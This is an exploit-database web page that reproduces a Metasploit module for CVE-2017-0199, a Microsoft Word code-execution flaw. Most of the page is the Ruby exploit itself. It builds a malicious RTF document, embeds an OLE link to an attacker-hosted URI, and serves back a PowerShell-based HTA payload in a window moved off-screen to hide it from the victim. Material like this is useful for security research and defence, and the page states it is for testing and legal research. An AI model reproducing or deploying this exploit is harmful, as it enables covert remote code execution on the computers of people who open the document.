Advertisement






Microsoft Office Word Malicious Hta Execution

CVE Category Price Severity
CVE-2017-0199 CWE-94 $5,000 - $25,000 High
Author Risk Exploitation Type Date
SandboxEscaper High Local 2017-04-25
CPE
cpe:cpe:/a:microsoft:office
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017040167

Below is a copy:

Microsoft Office Word Malicious Hta Execution##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Microsoft Office Word Malicious Hta Execution",
      'Description'    => %q{
        This module creates a malicious RTF file that when opened in
        vulnerable versions of Microsoft Word will lead to code execution.
        The flaw exists in how a olelink object can make a http(s) request,
        and execute hta code in response.

        This bug was originally seen being exploited in the wild starting
        in Oct 2016. This module was created by reversing a public
        malware sample.
      },
      'Author'         =>
        [
          'Haifei Li', # vulnerability analysis
          'ryHanson',
          'wdormann',
          'DidierStevens',
          'vysec',
          'Nixawk', # module developer
          'sinn3r'  # msf module improvement
        ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2017-0199'],
        ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
        ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
        ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
        ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
        ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
        ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
        ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
        ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
        ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
        ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
      ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Microsoft Office Word', {} ]
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 14 2017'))

    register_options([
      OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
      OptString.new('URIPATH',  [ true, 'The URI to use for the HTA file', 'default.hta'])
    ], self.class)
  end

  def generate_uri
    uri_maxlength = 112

    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    scheme = datastore['SSL'] ? 'https' : 'http'

    uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
    uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
    uri.delete!("\n")
    uri.delete!("\\x")
    uri.delete!("\\")

    padding_length = uri_maxlength * 2 - uri.length
    fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
    padding_length.times { uri << "0" }
    uri
  end

  def create_ole_ministream_data
    # require 'rex/ole'
    # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
    # ministream = ole.instance_variable_get(:@ministream)
    # ministream_data = ministream.instance_variable_get(:@data)

    ministream_data = ""
    ministream_data << "01000002090000000100000000000000" # 00000000: ................
    ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
    ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
    ministream_data << generate_uri
    ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
    ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
    ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
    ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
    ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
    ministream_data << "00000000000000000000000000000000" # 000000f0: ................
    ministream_data << "100203000d0000000000000000000000" # 00000100: ................
    ministream_data << "00000000000000000000000000000000" # 00000110: ................
    ministream_data << "00000000000000000000000000000000" # 00000120: ................
    ministream_data << "00000000000000000000000000000000" # 00000130: ................
    ministream_data << "00000000000000000000000000000000" # 00000140: ................
    ministream_data << "00000000000000000000000000000000" # 00000150: ................
    ministream_data << "00000000000000000000000000000000" # 00000160: ................
    ministream_data << "00000000000000000000000000000000" # 00000170: ................
    ministream_data << "00000000000000000000000000000000" # 00000180: ................
    ministream_data << "00000000000000000000000000000000" # 00000190: ................
    ministream_data << "00000000000000000000000000000000" # 000001a0: ................
    ministream_data << "00000000000000000000000000000000" # 000001b0: ................
    ministream_data << "00000000000000000000000000000000" # 000001c0: ................
    ministream_data << "00000000000000000000000000000000" # 000001d0: ................
    ministream_data << "00000000000000000000000000000000" # 000001e0: ................
    ministream_data << "00000000000000000000000000000000" # 000001f0: ................
    ministream_data
  end

  def create_rtf_format
    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
    template_rtf = ::File.open(template_path, 'rb')

    data = template_rtf.read(template_rtf.stat.size)
    data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
    template_rtf.close
    data
  end

  def on_request_uri(cli, req)
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )

    # This allows the HTA window to be invisible
    data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")

    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  def exploit
    file_create(create_rtf_format)
    super
  end
end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum